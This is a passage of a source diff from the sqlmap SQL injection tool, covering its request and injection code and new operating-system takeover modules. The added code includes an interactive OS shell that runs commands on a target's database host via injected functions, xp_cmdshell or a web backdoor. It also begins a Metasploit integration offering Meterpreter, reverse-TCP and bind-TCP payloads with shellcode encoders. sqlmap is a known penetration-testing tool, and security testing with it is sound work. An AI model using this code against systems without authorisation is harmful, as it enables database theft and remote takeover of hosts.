            # Perform HTTP request
            headers        = forgeHeaders(cookie, ua)
            req            = urllib2.Request(url, post, headers)
            conn           = urllib2.urlopen(req)

+            # Reset the number of connection retries
+            conf.retriesCount = 0
+
            if not req.has_header("Accept-Encoding"):
                requestHeaders += "\nAccept-Encoding: identity"

            requestHeaders = "\n".join(["%s: %s" % (header, value) for header, value in req.header_items()])

+            if not conf.dropSetCookie:
                for _, cookie in enumerate(conf.cj):
                    if not cookieStr:
                        cookieStr = "Cookie: "
@@ -145,30 +164,70 @@ class Connect:
            status          = conn.msg
            responseHeaders = conn.info()
            
+            encoding = responseHeaders.get("Content-Encoding")
+            page = decodePage(page, encoding)
+
        except urllib2.HTTPError, e:
            if e.code == 401:
                exceptionMsg  = "not authorized, try to provide right HTTP "
                exceptionMsg += "authentication type and valid credentials"
                raise sqlmapConnectionException, exceptionMsg
+            elif e.code == 404 and raise404:
+                exceptionMsg = "page not found"
+                raise sqlmapConnectionException, exceptionMsg
            else:
                page = e.read()
                code = e.code
                status = e.msg
                responseHeaders = e.info()

-        except urllib2.URLError, e:
+                debugMsg = "got HTTP error code: %d" % code
+                logger.debug(debugMsg)
+
+        except (urllib2.URLError, socket.error, socket.timeout, httplib.BadStatusLine), e:
+            tbMsg = traceback.format_exc()
+
+            if "URLError" in tbMsg or "error" in tbMsg:
+                warnMsg = "unable to connect to the target url"
+            elif "timeout" in tbMsg:
+                warnMsg = "connection timed out to the target url"
+            elif "BadStatusLine" in tbMsg:
+                warnMsg  = "the target url responded with an unknown HTTP "
+                warnMsg += "status code, try to force the HTTP User-Agent "
+                warnMsg += "header with option --user-agent or -a"
+            else:
                warnMsg = "unable to connect to the target url"

-            if conf.googleDork:
+            if "BadStatusLine" not in tbMsg:
+                warnMsg += " or proxy"
+
+            if conf.multipleTargets:
                warnMsg += ", skipping to next url"
                logger.warn(warnMsg)

-                return None
+                return None, None
+
+            if silent:
+                return None, None
+            elif conf.retriesCount < conf.retries:
+                conf.retriesCount += 1
+
+                warnMsg += ", sqlmap is going to retry the request"
+                logger.warn(warnMsg)
+
+                time.sleep(1)
+
+                socket.setdefaulttimeout(conf.timeout)
+                return Connect.__getPageProxy(**kwargs)
            else:
-                warnMsg += " or proxy"
+                socket.setdefaulttimeout(conf.timeout)
                raise sqlmapConnectionException, warnMsg

-        parsePage(page)
+        socket.setdefaulttimeout(conf.timeout)
+
+        page = sanitizeAsciiString(page)
+        
+        parseResponse(page, responseHeaders)
        responseMsg += "(%s - %d):\n" % (status, code)
        
        if conf.verbose <= 4:
@@ -178,11 +237,10 @@ class Connect:
        
        logger.log(8, responseMsg)

-        return page
-
+        return page, responseHeaders

    @staticmethod
-    def queryPage(value=None, place=None, content=False):
+    def queryPage(value=None, place=None, content=False, getSeqMatcher=False, silent=False):
        """
        This method calls a function to get the target url page content
        and returns its page MD5 hash or a boolean value in case of
@@ -221,14 +279,11 @@ class Connect:
            else:
                ua = conf.parameters["User-Agent"]

-        page = Connect.getPage(get=get, post=post, cookie=cookie, ua=ua)
+        page, headers = Connect.getPage(get=get, post=post, cookie=cookie, ua=ua, silent=silent)

        if content:
-            return page
-        elif conf.string:
-            if conf.string in page:
-                return True
+            return page, headers
+        elif page:
+            return comparison(page, headers, getSeqMatcher)
        else:
            return False
-        else:
-            return md5.new(page).hexdigest()
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 import re
 import time

@@ -31,28 +29,20 @@ from lib.core.agent import agent
 from lib.core.common import cleanQuery
 from lib.core.common import dataToSessionFile
 from lib.core.common import expandAsteriskForColumns
+from lib.core.common import parseUnionPage
 from lib.core.common import readInput
-from lib.core.common import replaceNewlineTabs
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.data import queries
 from lib.core.data import temp
+from lib.request.connect import Connect as Request
 from lib.techniques.inband.union.use import unionUse
-from lib.techniques.inference.blind import bisection
+from lib.techniques.blind.inference import bisection
 from lib.utils.resume import queryOutputLength
 from lib.utils.resume import resume

-
-def __getFieldsProxy(expression):
-    _, _, _, expressionFields = agent.getFields(expression)
-    expressionFieldsList = expressionFields.replace(", ", ",")
-    expressionFieldsList = expressionFieldsList.split(",")
-
-    return expressionFields, expressionFieldsList
-
-
-def __goInference(payload, expression):
+def __goInference(payload, expression, charsetType=None, firstChar=None, lastChar=None):
    start = time.time()

    if ( conf.eta or conf.threads > 1 ) and kb.dbms:
@@ -62,22 +52,38 @@ def __goInference(payload, expression):

    dataToSessionFile("[%s][%s][%s][%s][" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], expression))

-    count, value = bisection(payload, expression, length=length)
+    count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar)
    duration = int(time.time() - start)

-    infoMsg = "performed %d queries in %d seconds" % (count, duration)
+    if conf.eta and length:
+        infoMsg = "retrieved: %s" % value
        logger.info(infoMsg)

+    debugMsg = "performed %d queries in %d seconds" % (count, duration)
+    logger.debug(debugMsg)
+
    return value

-
-def __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected=None):
+def __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected=None, num=None, resumeValue=True, charsetType=None, firstChar=None, lastChar=None):
    outputs     = []
+    origExpr    = None

    for field in expressionFieldsList:
        output = None

+        if field.startswith("ROWNUM "):
+            continue
+
+        if isinstance(num, int):
+            origExpr   = expression
+            expression = agent.limitQuery(num, expression, field)
+
+        if "ROWNUM" in expressionFieldsList:
+            expressionReplaced = expression
+        else:
            expressionReplaced = expression.replace(expressionFields, field, 1)
+
+        if resumeValue:
            output = resume(expressionReplaced, payload)

        if not output or ( expected == "int" and not output.isdigit() ):
@@ -86,21 +92,23 @@ def __goInferenceFields(expression, expressionFields, expressionFieldsList, payl
                warnMsg += "sqlmap is going to retrieve the value again"
                logger.warn(warnMsg)

-            output = __goInference(payload, expressionReplaced)
+            output = __goInference(payload, expressionReplaced, charsetType, firstChar, lastChar)
+
+        if isinstance(num, int):
+            expression = origExpr

        outputs.append(output)

    return outputs

-
-def __goInferenceProxy(expression, fromUser=False, expected=None):
+def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, resumeValue=True, unpack=True, charsetType=None, firstChar=None, lastChar=None):
    """
    Retrieve the output of a SQL query characted by character taking
    advantage of an blind SQL injection vulnerability on the affected
    parameter through a bisection algorithm.
    """

-    query          = agent.prefixQuery(temp.inference)
+    query          = agent.prefixQuery(" %s" % temp.inference)
    query          = agent.postfixQuery(query)
    payload        = agent.payload(newValue=query)
    count          = None
@@ -111,13 +119,19 @@ def __goInferenceProxy(expression, fromUser=False, expected=None):
    untilLimitChar = None
    untilOrderChar = None

+    if resumeValue:
        output = resume(expression, payload)
+    else:
+        output = None

-    if output and ( expected == None or ( expected == "int" and output.isdigit() ) ):
+    if output and ( expected is None or ( expected == "int" and output.isdigit() ) ):
        return output

+    if not unpack:
+        return __goInference(payload, expression, charsetType, firstChar, lastChar)
+
    if kb.dbmsDetected:
-        expressionFields, expressionFieldsList = __getFieldsProxy(expression)
+        _, _, _, _, _, expressionFieldsList, expressionFields = agent.getFields(expression)

        if len(expressionFieldsList) > 1:
            infoMsg  = "the SQL query provided has more than a field. "
@@ -133,8 +147,9 @@ def __goInferenceProxy(expression, fromUser=False, expected=None):
        # can return multiple entries
        if fromUser and " FROM " in expression:
            limitRegExp = re.search(queries[kb.dbms].limitregexp, expression, re.I)
+            topLimit    = re.search("TOP\s+([\d]+)\s+", expression, re.I)

-            if limitRegExp:
+            if limitRegExp or ( kb.dbms == "Microsoft SQL Server" and topLimit ):
                if kb.dbms in ( "MySQL", "PostgreSQL" ):
                    limitGroupStart = queries[kb.dbms].limitgroupstart
                    limitGroupStop  = queries[kb.dbms].limitgroupstop
@@ -145,7 +160,22 @@ def __goInferenceProxy(expression, fromUser=False, expected=None):
                    stopLimit = limitRegExp.group(int(limitGroupStop))
                    limitCond = int(stopLimit) > 1

-                elif kb.dbms in ( "Oracle", "Microsoft SQL Server" ):
+                elif kb.dbms == "Microsoft SQL Server":
+                    if limitRegExp:
+                        limitGroupStart = queries[kb.dbms].limitgroupstart
+                        limitGroupStop  = queries[kb.dbms].limitgroupstop
+
+                        if limitGroupStart.isdigit():
+                            startLimit = int(limitRegExp.group(int(limitGroupStart)))
+
+                        stopLimit = limitRegExp.group(int(limitGroupStop))
+                        limitCond = int(stopLimit) > 1
+                    elif topLimit:
+                        startLimit = 0
+                        stopLimit  = int(topLimit.group(1))
+                        limitCond  = int(stopLimit) > 1
+
+                elif kb.dbms == "Oracle":
                    limitCond = False
            else:
                limitCond = True
@@ -164,12 +194,17 @@ def __goInferenceProxy(expression, fromUser=False, expected=None):
                        untilLimitChar = expression.index(queries[kb.dbms].limitstring)
                        expression = expression[:untilLimitChar]

+                    elif kb.dbms == "Microsoft SQL Server":
+                        stopLimit += startLimit
+
                if not stopLimit or stopLimit <= 1:
                    if kb.dbms == "Oracle" and expression.endswith("FROM DUAL"):
                        test = "n"
+                    elif batch:
+                        test = "y"
                    else:
-                        message  = "does the SQL query that you provide might "
-                        message += "return multiple entries? [Y/n] "
+                        message  = "can the SQL query provided return "
+                        message += "multiple entries? [Y/n] "
                        test = readInput(message, default="Y")

                if not test or test[0] in ("y", "Y"):
@@ -181,20 +216,24 @@ def __goInferenceProxy(expression, fromUser=False, expected=None):
                        untilOrderChar = countedExpression.index(" ORDER BY ")
                        countedExpression = countedExpression[:untilOrderChar]

+                    if resumeValue:
                        count = resume(countedExpression, payload)

                    if not stopLimit:
                        if not count or not count.isdigit():
-                            count = __goInference(payload, countedExpression)
+                            count = __goInference(payload, countedExpression, charsetType, firstChar, lastChar)

-                        if count.isdigit() and int(count) > 0:
+                        if count and count.isdigit() and int(count) > 0:
                            count = int(count)

-                            message  = "the SQL query that you provide can "
-                            message += "return up to %d entries. How many " % count
+                            if batch:
+                                stopLimit = count
+                            else:
+                                message  = "the SQL query provided can return "
+                                message += "up to %d entries. How many " % count
                                message += "entries do you want to retrieve?\n"
                                message += "[a] All (default)\n[#] Specific number\n"
-                            message += "[q] Quit\nChoice: "
+                                message += "[q] Quit"
                                test = readInput(message, default="a")

                                if not test or test[0] in ("a", "A"):
@@ -229,51 +268,31 @@ def __goInferenceProxy(expression, fromUser=False, expected=None):

                                    return None

+                        elif count and not count.isdigit():
+                            warnMsg  = "it was not possible to count the number "
+                            warnMsg += "of entries for the SQL query provided. "
+                            warnMsg += "sqlmap will assume that it returns only "
+                            warnMsg += "one entry"
+                            logger.warn(warnMsg)
+
+                            stopLimit = 1
+
                        elif ( not count or int(count) == 0 ):
-                            warnMsg  = "the SQL query that you provided does "
-                            warnMsg += "not return any output"
+                            warnMsg  = "the SQL query provided does not "
+                            warnMsg += "return any output"
                            logger.warn(warnMsg)

                            return None

                    elif ( not count or int(count) == 0 ) and ( not stopLimit or stopLimit == 0 ):
-                        warnMsg  = "the SQL query that you provided does "
-                        warnMsg += "not return any output"
+                        warnMsg  = "the SQL query provided does not "
+                        warnMsg += "return any output"
                        logger.warn(warnMsg)

                        return None

                    for num in xrange(startLimit, stopLimit):
-                        limitedExpr = expression
-
-                        if kb.dbms in ( "MySQL", "PostgreSQL" ):
-                            limitStr = queries[kb.dbms].limit % (num, 1)
-                            limitedExpr += " %s" % limitStr
-
-                        elif kb.dbms == "Oracle":
-                            limitStr     = queries[kb.dbms].limit
-                            fromIndex    = limitedExpr.index(" FROM ")
-                            untilFrom    = limitedExpr[:fromIndex]
-                            fromFrom     = limitedExpr[fromIndex+1:]
-                            limitedExpr  = "%s FROM (%s, %s" % (untilFrom, untilFrom, limitStr)
-                            limitedExpr  = limitedExpr % fromFrom
-                            limitedExpr += "=%d" % (num + 1)
-
-                        elif kb.dbms == "Microsoft SQL Server":
-                            if re.search(" ORDER BY ", limitedExpr, re.I):
-                                untilOrderChar = limitedExpr.index(" ORDER BY ")
-                                limitedExpr = limitedExpr[:untilOrderChar]
-
-                            limitStr     = queries[kb.dbms].limit
-                            fromIndex    = limitedExpr.index(" FROM ")
-                            untilFrom    = limitedExpr[:fromIndex]
-                            fromFrom     = limitedExpr[fromIndex+1:]
-                            limitedExpr  = limitedExpr.replace("SELECT ", (limitStr % 1), 1)
-                            limitedExpr  = "%s WHERE %s " % (limitedExpr, expressionFieldsList[0])
-                            limitedExpr += "NOT IN (%s" % (limitStr % num)
-                            limitedExpr += "%s %s)" % (expressionFieldsList[0], fromFrom)
-
-                        output = __goInferenceFields(limitedExpr, expressionFields, expressionFieldsList, payload, expected)
+                        output = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected, num, resumeValue=resumeValue, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar)
                        outputs.append(output)

                    return outputs
@@ -281,22 +300,21 @@ def __goInferenceProxy(expression, fromUser=False, expected=None):
        elif kb.dbms == "Oracle" and expression.startswith("SELECT ") and " FROM " not in expression:
            expression = "%s FROM DUAL" % expression

-        outputs = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected)
+        outputs = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected, resumeValue=resumeValue, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar)

        returnValue = ", ".join([output for output in outputs])
+
    else:
-        returnValue = __goInference(payload, expression)
+        returnValue = __goInference(payload, expression, charsetType, firstChar, lastChar)

    return returnValue

-
-def __goInband(expression, expected=None):
+def __goInband(expression, expected=None, sort=True, resumeValue=True, unpack=True):
    """
    Retrieve the output of a SQL query taking advantage of an inband SQL
    injection vulnerability on the affected parameter.
    """

-    counter = None
    output  = None
    partial = False
    data    = []
@@ -306,61 +324,21 @@ def __goInband(expression, expected=None):
                  and expression in kb.resumedQueries[conf.url].keys()
                )

-    if condition:
+    if condition and resumeValue:
        output = resume(expression, None)

        if not output or ( expected == "int" and not output.isdigit() ):
            partial = True

    if not output:
-        output = unionUse(expression)
-
-    fields = expression.split(",")
-    counter = len(fields)
+        output = unionUse(expression, resetCounter=True, unpack=unpack)

    if output:
-        outCond1 = ( output.startswith(temp.start) and output.endswith(temp.stop) )
-        outCond2 = ( output.startswith("__START__") and output.endswith("__STOP__") )
-
-        if outCond1 or outCond2:
-            if outCond1:
-                regExpr = '%s(.*?)%s' % (temp.start, temp.stop)
-            elif outCond2:
-                regExpr = '__START__(.*?)__STOP__'
-
-            output = re.findall(regExpr, output, re.S)
-
-            if partial or not condition:
-                logOutput = "".join(["__START__%s__STOP__" % replaceNewlineTabs(value) for value in output])
-                dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], expression, logOutput))
-
-            output = set(output)
-
-            for entry in output:
-                info = []
-
-                if "__DEL__" in entry:
-                    entry = entry.split("__DEL__")
-                else:
-                    entry = entry.split(temp.delimiter)
-
-                if len(entry) == 1:
-                    data.append(entry[0])
-                else:
-                    for value in entry:
-                        info.append(value)
-
-                    data.append(info)
-        else:
-            data = output
-
-        if len(data) == 1 and isinstance(data[0], str):
-            data = data[0]
+        data = parseUnionPage(output, expression, partial, condition, sort)

    return data

-
-def getValue(expression, blind=True, inband=True, fromUser=False, expected=None):
+def getValue(expression, blind=True, inband=True, fromUser=False, expected=None, batch=False, unpack=True, sort=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None):
    """
    Called each time sqlmap inject a SQL query on the SQL injection
    affected parameter. It can call a function to retrieve the output
@@ -372,10 +350,43 @@ def getValue(expression, blind=True, inband=True, fromUser=False, expected=None)
    expression = expandAsteriskForColumns(expression)
    value      = None

-    if inband and conf.unionUse and kb.dbms:
-        value = __goInband(expression, expected)
+    expression = expression.replace("DISTINCT ", "")
+
+    if inband and kb.unionPosition:
+        if kb.dbms == "Oracle" and " ORDER BY " in expression:
+            expression = expression[:expression.index(" ORDER BY ")]
+
+        value = __goInband(expression, expected, sort, resumeValue, unpack)
+
+        if not value:
+            warnMsg  = "for some reasons it was not possible to retrieve "
+            warnMsg += "the query output through inband SQL injection "
+            warnMsg += "technique, sqlmap is going blind"
+            logger.warn(warnMsg)
+
+    oldParamFalseCond   = conf.paramFalseCond
+    oldParamNegative    = conf.paramNegative
+    conf.paramFalseCond = False
+    conf.paramNegative  = False

    if blind and not value:
-        value = __goInferenceProxy(expression, fromUser, expected)
+        value = __goInferenceProxy(expression, fromUser, expected, batch, resumeValue, unpack, charsetType, firstChar, lastChar)
+
+    conf.paramFalseCond = oldParamFalseCond
+    conf.paramNegative  = oldParamNegative

    return value
+
+def goStacked(expression, silent=False):
+    expression = cleanQuery(expression)
+
+    debugMsg = "query: %s" % expression
+    logger.debug(debugMsg)
+
+    comment = queries[kb.dbms].comment
+    query   = agent.prefixQuery("; %s" % expression)
+    query   = agent.postfixQuery("%s;%s" % (query, comment))
+    payload = agent.payload(newValue=query)
+    page, _ = Request.queryPage(payload, content=True, silent=silent)
+
+    return payload, page
--- a/lib/request/proxy.py
+++ b/lib/request/proxy.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,13 +22,15 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 import httplib
 import socket
 import urllib
 import urllib2

+from lib.core.settings import PYVERSION
+
+if PYVERSION >= "2.6":
+    import ssl

 class ProxyHTTPConnection(httplib.HTTPConnection):
    _ports = {"http" : 80, "https" : 443}
@@ -57,8 +59,7 @@ class ProxyHTTPConnection(httplib.HTTPConnection):
        self._real_host = host
        self._real_port = int(port)

-        httplib.HTTPConnection.request(self, method, url, body, headers)
-
+        httplib.HTTPConnection.request(self, method, rest, body, headers)

    def connect(self):
        httplib.HTTPConnection.connect(self)
@@ -85,11 +86,10 @@ class ProxyHTTPConnection(httplib.HTTPConnection):
            if line == "\r\n":
                break

-
 class ProxyHTTPSConnection(ProxyHTTPConnection):
    default_port = 443

-    def __init__(self, host, port=None, key_file=None, cert_file=None, strict=None):
+    def __init__(self, host, port=None, key_file=None, cert_file=None, strict=None, timeout=None):
        ProxyHTTPConnection.__init__(self, host, port)
        self.key_file = key_file
        self.cert_file = cert_file
@@ -98,9 +98,12 @@ class ProxyHTTPSConnection(ProxyHTTPConnection):
        ProxyHTTPConnection.connect(self)

        # Make the sock ssl-aware
-        ssl = socket.ssl(self.sock, self.key_file, self.cert_file)
-        self.sock = httplib.FakeSocket(self.sock, ssl)
-
+        if PYVERSION >= "2.6":
+            sslobj    = ssl.wrap_socket(self.sock, self.key_file, self.cert_file)
+            self.sock = sslobj
+        else:
+            sslobj    = socket.ssl(self.sock, self.key_file, self.cert_file)
+            self.sock = httplib.FakeSocket(self.sock, sslobj)

 class ProxyHTTPHandler(urllib2.HTTPHandler):
    def __init__(self, proxy=None, debuglevel=0):
@@ -114,7 +117,6 @@ class ProxyHTTPHandler(urllib2.HTTPHandler):

        return urllib2.HTTPHandler.do_open(self, ProxyHTTPConnection, req)

-
 class ProxyHTTPSHandler(urllib2.HTTPSHandler):
    def __init__(self, proxy=None, debuglevel=0):
        self.proxy = proxy
--- a/lib/takeover/init.py
+++ b/lib/takeover/init.py
@@ -0,0 +1,25 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+pass
--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@@ -0,0 +1,173 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+from lib.core.common import readInput
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.dump import dumper
+from lib.core.exception import sqlmapUnsupportedFeatureException
+from lib.core.shell import autoCompletion
+from lib.takeover.udf import UDF
+from lib.takeover.web import Web
+from lib.takeover.xp_cmdshell import xp_cmdshell
+
+class Abstraction(Web, UDF, xp_cmdshell):
+    """
+    This class defines an abstraction layer for OS takeover functionalities
+    to UDF / xp_cmdshell objects
+    """
+
+    def __init__(self):
+        self.envInitialized = False
+        self.alwaysRetrieveCmdOutput = False
+
+        UDF.__init__(self)
+        Web.__init__(self)
+        xp_cmdshell.__init__(self)
+
+    def execCmd(self, cmd, silent=False, forgeCmd=False):
+        if self.webBackdoorUrl and not kb.stackedTest:
+            self.webBackdoorRunCmd(cmd)
+
+        elif kb.dbms in ( "MySQL", "PostgreSQL" ):
+            self.udfExecCmd(cmd, silent=silent)
+
+        elif kb.dbms == "Microsoft SQL Server":
+            self.xpCmdshellExecCmd(cmd, silent, forgeCmd)
+
+        else:
+            errMsg = "Feature not yet implemented for the back-end DBMS"
+            raise sqlmapUnsupportedFeatureException, errMsg
+
+    def evalCmd(self, cmd, first=None, last=None):
+        if self.webBackdoorUrl and not kb.stackedTest:
+            return self.webBackdoorRunCmd(cmd)
+
+        elif kb.dbms in ( "MySQL", "PostgreSQL" ):
+            return self.udfEvalCmd(cmd, first, last)
+
+        elif kb.dbms == "Microsoft SQL Server":
+            return self.xpCmdshellEvalCmd(cmd, first, last)
+
+        else:
+            errMsg = "Feature not yet implemented for the back-end DBMS"
+            raise sqlmapUnsupportedFeatureException, errMsg
+
+    def runCmd(self, cmd):
+        getOutput = None
+
+        if not self.alwaysRetrieveCmdOutput:
+            message   = "do you want to retrieve the command standard "
+            message  += "output? [Y/n/a] "
+            getOutput = readInput(message, default="Y")
+            
+            if getOutput in ("a", "A"):
+                self.alwaysRetrieveCmdOutput = True
+
+        if not getOutput or getOutput in ("y", "Y") or self.alwaysRetrieveCmdOutput:
+            output = self.evalCmd(cmd)
+
+            if output:
+                dumper.string("command standard output", output)
+            else:
+                print "No output"
+        else:
+            self.execCmd(cmd, forgeCmd=True)
+
+    def shell(self):
+        if self.webBackdoorUrl and not kb.stackedTest:
+            infoMsg  = "calling OS shell. To quit type "
+            infoMsg += "'x' or 'q' and press ENTER"
+            logger.info(infoMsg)
+
+        else:
+            if kb.dbms in ( "MySQL", "PostgreSQL" ):
+                infoMsg  = "going to use injected sys_eval and sys_exec "
+                infoMsg += "user-defined functions for operating system "
+                infoMsg += "command execution"
+                logger.info(infoMsg)
+
+            elif kb.dbms == "Microsoft SQL Server":
+                infoMsg  = "going to use xp_cmdshell extended procedure for "
+                infoMsg += "operating system command execution"
+                logger.info(infoMsg)
+
+            else:
+                errMsg = "feature not yet implemented for the back-end DBMS"
+                raise sqlmapUnsupportedFeatureException, errMsg
+
+            infoMsg  = "calling %s OS shell. To quit type " % kb.os or "Windows"
+            infoMsg += "'x' or 'q' and press ENTER"
+            logger.info(infoMsg)
+
+        autoCompletion(osShell=True)
+
+        while True:
+            command = None
+
+            try:
+                command = raw_input("os-shell> ")
+            except KeyboardInterrupt:
+                print
+                errMsg = "user aborted"
+                logger.error(errMsg)
+            except EOFError:
+                print
+                errMsg = "exit"
+                logger.error(errMsg)
+                break
+
+            if not command:
+                continue
+
+            if command.lower() in ( "x", "q", "exit", "quit" ):
+                break
+
+            self.runCmd(command)
+
+    def initEnv(self, mandatory=True, detailed=False, web=False):
+        if self.envInitialized:
+            return
+
+        if web:
+            self.webInit()
+        else:
+            self.checkDbmsOs(detailed)
+
+            if mandatory and not self.isDba():
+                warnMsg  = "the functionality requested might not work because "
+                warnMsg += "the session user is not a database administrator"
+                logger.warn(warnMsg)
+
+            if kb.dbms in ( "MySQL", "PostgreSQL" ):
+                self.udfInjectSys()
+            elif kb.dbms == "Microsoft SQL Server":
+                if mandatory:
+                    self.xpCmdshellInit()
+            else:
+                errMsg = "feature not yet implemented for the back-end DBMS"
+                raise sqlmapUnsupportedFeatureException(errMsg)
+
+        self.envInitialized = True
--- a/lib/takeover/metasploit.py
+++ b/lib/takeover/metasploit.py
@@ -0,0 +1,698 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+import os
+import re
+import stat
+import sys
+import time
+
+from select import select
+from subprocess import PIPE
+from subprocess import Popen as execute
+
+from lib.core.agent import agent
+from lib.core.common import dataToStdout
+from lib.core.common import getLocalIP
+from lib.core.common import getRemoteIP
+from lib.core.common import normalizePath
+from lib.core.common import pollProcess
+from lib.core.common import randomRange
+from lib.core.common import randomStr
+from lib.core.common import readInput
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.exception import sqlmapDataException
+from lib.core.exception import sqlmapFilePathException
+from lib.core.subprocessng import blockingReadFromFD
+from lib.core.subprocessng import blockingWriteToFD
+from lib.core.subprocessng import setNonBlocking
+from lib.request.connect import Connect as Request
+from lib.takeover.upx import upx
+
+
+class Metasploit:
+    """
+    This class defines methods to call Metasploit for plugins.
+    """
+
+    def __initVars(self):
+        self.connectionStr  = None
+        self.lhostStr       = None
+        self.rhostStr       = None
+        self.portStr        = None
+        self.payloadStr     = None
+        self.encoderStr     = None
+        self.payloadConnStr = None
+
+        self.resourceFile   = None
+
+        self.localIP        = getLocalIP()
+        self.remoteIP       = getRemoteIP()
+
+        self.__msfCli       = normalizePath(os.path.join(conf.msfPath, "msfcli"))
+        self.__msfConsole   = normalizePath(os.path.join(conf.msfPath, "msfconsole"))
+        self.__msfEncode    = normalizePath(os.path.join(conf.msfPath, "msfencode"))
+        self.__msfPayload   = normalizePath(os.path.join(conf.msfPath, "msfpayload"))
+
+        self.__msfPayloadsList    = {
+                                      "windows": {
+                                                   1: ( "Meterpreter (default)", "windows/meterpreter" ),
+                                                   2: ( "Shell", "windows/shell" ),
+                                                   3: ( "VNC", "windows/vncinject" ),
+                                                 },
+                                      "linux":   {
+                                                   1: ( "Shell", "linux/x86/shell" ),
+                                                 }
+                                    }
+
+        self.__msfConnectionsList = {
+                                      "windows": {
+                                                   1: ( "Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp" ),
+                                                   2: ( "Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports" ),
+                                                   3: ( "Bind TCP: Listen on the database host for a connection", "bind_tcp" ),
+                                                 },
+                                      "linux":   {
+                                                   1: ( "Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp" ),
+                                                   2: ( "Bind TCP: Listen on the database host for a connection", "bind_tcp" ),
+                                                 }
+                                    }
+
+        self.__msfEncodersList    = {
+                                      "windows": {
+                                                   1: ( "No Encoder", "generic/none" ),
+                                                   2: ( "Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed" ),
+                                                   3: ( "Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper" ),
+                                                   4: ( "Avoid UTF8/tolower", "x86/avoid_utf8_tolower" ),
+                                                   5: ( "Call+4 Dword XOR Encoder", "x86/call4_dword_xor" ),
